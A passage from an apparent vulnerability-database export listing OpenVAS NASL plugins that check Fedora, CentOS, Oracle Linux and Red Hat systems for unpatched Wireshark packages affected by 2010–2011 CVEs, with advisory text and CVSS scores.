value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2011-0167\");\n script_cve_id(\"CVE-2010-2287\", \"CVE-2010-2286\", \"CVE-2010-2284\", \"CVE-2010-2283\", \"CVE-2010-4538\");\n script_name(\"Fedora Update for wireshark FEDORA-2011-0167\");\n\n script_summary(\"Check for the Version of wireshark\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC13\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.2.13~2.fc13\", rls:\"FC13\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:31", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-02-04T00:00:00", "type": "openvas", "title": "Fedora Update for wireshark FEDORA-2011-0460", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2284", "CVE-2010-2287", "CVE-2011-0444", "CVE-2010-2283", "CVE-2010-2286", "CVE-2011-0445"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310862831", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310862831", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for wireshark FEDORA-2011-0460\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-February/053669.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.862831\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-02-04 14:19:53 +0100 (Fri, 04 Feb 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2011-0460\");\n script_cve_id(\"CVE-2010-2287\", \"CVE-2010-2286\", \"CVE-2010-2284\", \"CVE-2010-2283\", \"CVE-2011-0444\", \"CVE-2011-0445\");\n script_name(\"Fedora Update for wireshark FEDORA-2011-0460\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'wireshark'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC13\");\n script_tag(name:\"affected\", value:\"wireshark on Fedora 13\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC13\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.2.14~1.fc13\", rls:\"FC13\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-22T13:05:36", "description": "Check for the Version of wireshark", "cvss3": {}, "published": "2010-08-30T00:00:00", "type": "openvas", "title": "CentOS Update for wireshark CESA-2010:0625 centos4 i386", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2284", "CVE-2010-2287", "CVE-2010-1455", "CVE-2010-2283", "CVE-2010-2995", "CVE-2010-2286"], "modified": "2018-01-22T00:00:00", "id": "OPENVAS:1361412562310880413", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880413", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for wireshark CESA-2010:0625 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Wireshark is a program for monitoring network traffic. Wireshark was\n previously known as Ethereal.\n\n Multiple buffer overflow flaws were found in the Wireshark SigComp\n Universal Decompressor Virtual Machine (UDVM) dissector. If Wireshark read\n a malformed packet off a network or opened a malicious dump file, it could\n crash or, possibly, execute arbitrary code as the user running Wireshark.\n (CVE-2010-2287, CVE-2010-2995)\n\n Several denial of service flaws were found in Wireshark. Wireshark could\n crash or stop responding if it read a malformed packet off a network, or\n opened a malicious dump file. (CVE-2010-1455, CVE-2010-2283, CVE-2010-2284,\n CVE-2010-2286)\n\n Users of Wireshark should upgrade to these updated packages, which contain\n Wireshark version 1.0.15, and resolve these issues. All running instances\n of Wireshark must be restarted for the update to take effect.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"wireshark on CentOS 4\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2010-August/016932.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880413\");\n script_version(\"$Revision: 8485 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-22 08:57:57 +0100 (Mon, 22 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-08-30 16:59:25 +0200 (Mon, 30 Aug 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2010:0625\");\n script_cve_id(\"CVE-2010-1455\", \"CVE-2010-2283\", \"CVE-2010-2284\", \"CVE-2010-2286\", \"CVE-2010-2287\", \"CVE-2010-2995\");\n script_name(\"CentOS Update for wireshark CESA-2010:0625 centos4 i386\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of wireshark\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.0.15~1.el4_8.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-gnome\", rpm:\"wireshark-gnome~1.0.15~1.el4_8.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:36:34", "description": "Oracle Linux Local Security Checks ELSA-2010-0625", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2010-0625", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2284", "CVE-2010-2287", "CVE-2010-1455", "CVE-2010-2283", "CVE-2010-2995", "CVE-2010-2286"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310122329", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122329", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2010-0625.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122329\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:16:55 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2010-0625\");\n script_tag(name:\"insight\", value:\"ELSA-2010-0625 - wireshark security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2010-0625\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2010-0625.html\");\n script_cve_id(\"CVE-2010-1455\", \"CVE-2010-2283\", \"CVE-2010-2284\", \"CVE-2010-2286\", \"CVE-2010-2287\", \"CVE-2010-2995\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.0.15~1.0.1.el5_5.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"wireshark-gnome\", rpm:\"wireshark-gnome~1.0.15~1.0.1.el5_5.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-08T12:53:34", "description": "Check for the Version of wireshark", "cvss3": {}, "published": "2010-08-13T00:00:00", "type": "openvas", "title": "RedHat Update for wireshark RHSA-2010:0625-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2284", "CVE-2010-2287", "CVE-2010-1455", "CVE-2010-2283", "CVE-2010-2995", "CVE-2010-2286"], "modified": "2018-01-05T00:00:00", "id": "OPENVAS:1361412562310870307", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870307", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for wireshark RHSA-2010:0625-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Wireshark is a program for monitoring network traffic. Wireshark was\n previously known as Ethereal.\n\n Multiple buffer overflow flaws were found in the Wireshark SigComp\n Universal Decompressor Virtual Machine (UDVM) dissector. If Wireshark read\n a malformed packet off a network or opened a malicious dump file, it could\n crash or, possibly, execute arbitrary code as the user running Wireshark.\n (CVE-2010-2287, CVE-2010-2995)\n\n Several denial of service flaws were found in Wireshark. Wireshark could\n crash or stop responding if it read a malformed packet off a network, or\n opened a malicious dump file. (CVE-2010-1455, CVE-2010-2283, CVE-2010-2284,\n CVE-2010-2286)\n\n Users of Wireshark should upgrade to these updated packages, which contain\n Wireshark version 1.0.15, and resolve these issues. All running instances\n of Wireshark must be restarted for the update to take effect.\";\n\ntag_affected = \"wireshark on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux AS version 3,\n Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 3,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 3,\n Red Hat Enterprise Linux WS version 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2010-August/msg00017.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870307\");\n script_version(\"$Revision: 8296 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 08:28:01 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-08-13 14:24:53 +0200 (Fri, 13 Aug 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2010:0625-01\");\n script_cve_id(\"CVE-2010-1455\", \"CVE-2010-2283\", \"CVE-2010-2284\", \"CVE-2010-2286\", \"CVE-2010-2287\", \"CVE-2010-2995\");\n script_name(\"RedHat Update for wireshark RHSA-2010:0625-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of wireshark\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.0.15~1.el5_5.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-debuginfo\", rpm:\"wireshark-debuginfo~1.0.15~1.el5_5.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-gnome\", rpm:\"wireshark-gnome~1.0.15~1.el5_5.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.0.15~1.el4_8.1\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-debuginfo\", rpm:\"wireshark-debuginfo~1.0.15~1.el4_8.1\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-gnome\", rpm:\"wireshark-gnome~1.0.15~1.el4_8.1\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_3\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.0.15~EL3.1\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-debuginfo\", rpm:\"wireshark-debuginfo~1.0.15~EL3.1\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-gnome\", rpm:\"wireshark-gnome~1.0.15~EL3.1\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:54:09", "description": "Check for the Version of wireshark", "cvss3": {}, "published": "2010-08-30T00:00:00", "type": "openvas", "title": "CentOS Update for wireshark CESA-2010:0625 centos4 i386", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2284", "CVE-2010-2287", "CVE-2010-1455", "CVE-2010-2283", "CVE-2010-2995", "CVE-2010-2286"], "modified": "2017-12-22T00:00:00", "id": "OPENVAS:880413", "href": "http://plugins.openvas.org/nasl.php?oid=880413", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for wireshark CESA-2010:0625 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Wireshark is a program for monitoring network traffic. Wireshark was\n previously known as Ethereal.\n\n Multiple buffer overflow flaws were found in the Wireshark SigComp\n Universal Decompressor Virtual Machine (UDVM) dissector. If Wireshark read\n a malformed packet off a network or opened a malicious dump file, it could\n crash or, possibly, execute arbitrary code as the user running Wireshark.\n (CVE-2010-2287, CVE-2010-2995)\n\n Several denial of service flaws were found in Wireshark. Wireshark could\n crash or stop responding if it read a malformed packet off a network, or\n opened a malicious dump file. (CVE-2010-1455, CVE-2010-2283, CVE-2010-2284,\n CVE-2010-2286)\n\n Users of Wireshark should upgrade to these updated packages, which contain\n Wireshark version 1.0.15, and resolve these issues. All running instances\n of Wireshark must be restarted for the update to take effect.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"wireshark on CentOS 4\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2010-August/016932.html\");\n script_id(880413);\n script_version(\"$Revision: 8226 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-22 07:30:26 +0100 (Fri, 22 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-08-30 16:59:25 +0200 (Mon, 30 Aug 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2010:0625\");\n script_cve_id(\"CVE-2010-1455\", \"CVE-2010-2283\", \"CVE-2010-2284\", \"CVE-2010-2286\", \"CVE-2010-2287\", \"CVE-2010-2995\");\n script_name(\"CentOS Update for wireshark CESA-2010:0625 centos4 i386\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of wireshark\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.0.15~1.el4_8.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-gnome\", rpm:\"wireshark-gnome~1.0.15~1.el4_8.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-18T10:57:48", "description": "Check for the Version of wireshark", "cvss3": {}, "published": "2010-08-13T00:00:00", "type": "openvas", "title": "RedHat Update for wireshark RHSA-2010:0625-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2284", "CVE-2010-2287", "CVE-2010-1455", "CVE-2010-2283", "CVE-2010-2995", "CVE-2010-2286"], "modified": "2017-12-18T00:00:00", "id": "OPENVAS:870307", "href": "http://plugins.openvas.org/nasl.php?oid=870307", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for wireshark RHSA-2010:0625-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Wireshark is a program for monitoring network traffic. Wireshark was\n previously known as Ethereal.\n\n Multiple buffer overflow flaws were found in the Wireshark SigComp\n Universal Decompressor Virtual Machine (UDVM) dissector. If Wireshark read\n a malformed packet off a network or opened a malicious dump file, it could\n crash or, possibly, execute arbitrary code as the user running Wireshark.\n (CVE-2010-2287, CVE-2010-2995)\n\n Several denial of service flaws were found in Wireshark. Wireshark could\n crash or stop responding if it read a malformed packet off a network, or\n opened a malicious dump file. (CVE-2010-1455, CVE-2010-2283, CVE-2010-2284,\n CVE-2010-2286)\n\n Users of Wireshark should upgrade to these updated packages, which contain\n Wireshark version 1.0.15, and resolve these issues. All running instances\n of Wireshark must be restarted for the update to take effect.\";\n\ntag_affected = \"wireshark on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux AS version 3,\n Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 3,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 3,\n Red Hat Enterprise Linux WS version 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2010-August/msg00017.html\");\n script_id(870307);\n script_version(\"$Revision: 8153 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-18 07:30:39 +0100 (Mon, 18 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-08-13 14:24:53 +0200 (Fri, 13 Aug 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2010:0625-01\");\n script_cve_id(\"CVE-2010-1455\", \"CVE-2010-2283\", \"CVE-2010-2284\", \"CVE-2010-2286\", \"CVE-2010-2287\", \"CVE-2010-2995\");\n script_name(\"RedHat Update for wireshark RHSA-2010:0625-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of wireshark\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.0.15~1.el5_5.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-debuginfo\", rpm:\"wireshark-debuginfo~1.0.15~1.el5_5.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-gnome\", rpm:\"wireshark-gnome~1.0.15~1.el5_5.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.0.15~1.el4_8.1\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-debuginfo\", rpm:\"wireshark-debuginfo~1.0.15~1.el4_8.1\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-gnome\", rpm:\"wireshark-gnome~1.0.15~1.el4_8.1\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n 